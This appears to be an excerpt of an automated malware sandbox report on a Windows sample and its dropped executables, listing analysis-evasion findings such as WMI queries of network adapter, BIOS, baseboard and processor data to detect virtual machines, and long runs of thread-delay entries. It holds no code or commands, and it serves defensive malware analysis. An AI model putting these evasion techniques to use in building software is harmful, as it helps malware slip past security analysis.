              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
              Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 2056Thread sleep time: -23058430092136925s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 1304Thread sleep count: 9668 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3232Thread sleep time: -12912720851596678s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5364Thread sleep count: 9210 > 30Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -7378697629483816s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1200000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1199812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1199514s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1199359s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1199233s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1199106s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198966s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198812s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198685s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198451s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198312s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198185s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1198062s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1197936s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1197810s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1197656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1197492s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1197250s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196906s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196405s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196247s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1196109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195997s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195874s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195655s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195545s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195406s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195280s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195171s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1195046s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194937s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194824s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194703s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194593s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194484s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194374s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194265s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194156s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1194046s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193934s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193811s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193544s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193420s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193285s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193150s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1193006s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1192887s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1192772s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exe TID: 5124Thread sleep time: -1192647s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 3312Thread sleep time: -9223372036854770s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 3312Thread sleep count: 34 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 3160Thread sleep count: 9536 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5176Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 5176Thread sleep count: 41 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 3924Thread sleep count: 9623 > 30Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 5040Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 5040Thread sleep count: 44 > 30
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4556Thread sleep count: 9596 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -11990383647911201s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5172Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4980Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4980Thread sleep count: 39 > 30
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exe TID: 4936Thread sleep count: 9642 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4424Thread sleep time: -11068046444225724s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 1812Thread sleep count: 639 > 30
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1200000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1198890s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1198750s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1198343s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1198203s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197874s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197561s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197296s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1197077s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196949s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196750s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196593s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1196390s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1195843s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1195587s >= -30000s
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exe TID: 4532Thread sleep time: -1195093s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3068Thread sleep count: 2115 > 30
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeLast function: Thread delayed
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1200000Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199812Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199514Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199359Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199233Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199106Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198966Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198812Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198685Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198451Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198312Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198185Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198062Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197936Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197810Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197656Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197492Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197250Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196906Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196703Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196562Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196405Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196247Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196109Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195997Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195874Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195765Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195655Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195545Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195406Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195280Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195171Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195046Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194937Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194824Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194703Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194593Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194484Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194374Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194265Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194156Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194046Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193934Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193811Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193656Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193544Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193420Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193285Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193150Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193006Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192887Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192772Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1192647Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeThread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1200000
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198890
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198343
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1198203
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197874
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197561
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197296
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1197077
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196949
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196750
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196593
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1196390
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195843
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195587
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeThread delayed: delay time: 1195093
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWindow / User API: threadDelayed 9668Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9400Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWindow / User API: threadDelayed 9210Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindow / User API: threadDelayed 9536Jump to behavior
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9623Jump to behavior
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindow / User API: threadDelayed 9596
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7267
              Source: C:\Users\user\AppData\Roaming\kDPmkTm\kDPmkTm.exeWindow / User API: threadDelayed 9642
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9081
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWindow / User API: threadDelayed 639
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2115
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
              Source: C:\Users\user\AppData\Roaming\Ienlugq\Oefdyik.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1200000Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199812Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199514Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199359Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199233Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1199106Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198966Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198812Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198685Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198451Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198312Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198185Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1198062Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197936Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197810Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197656Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197492Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1197250Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196906Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196703Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196562Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196405Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196247Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1196109Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195997Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195874Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195765Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195655Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195545Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195406Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195280Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195171Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1195046Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194937Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194824Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194703Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194593Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194484Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194374Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194265Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194156Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1194046Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193934Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193811Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193656Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193544Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193420Jump to behavior
              Source: C:\Users\user\Desktop\izwFjkhFJm.exeThread delayed: delay time: 1193285Jump to behavior
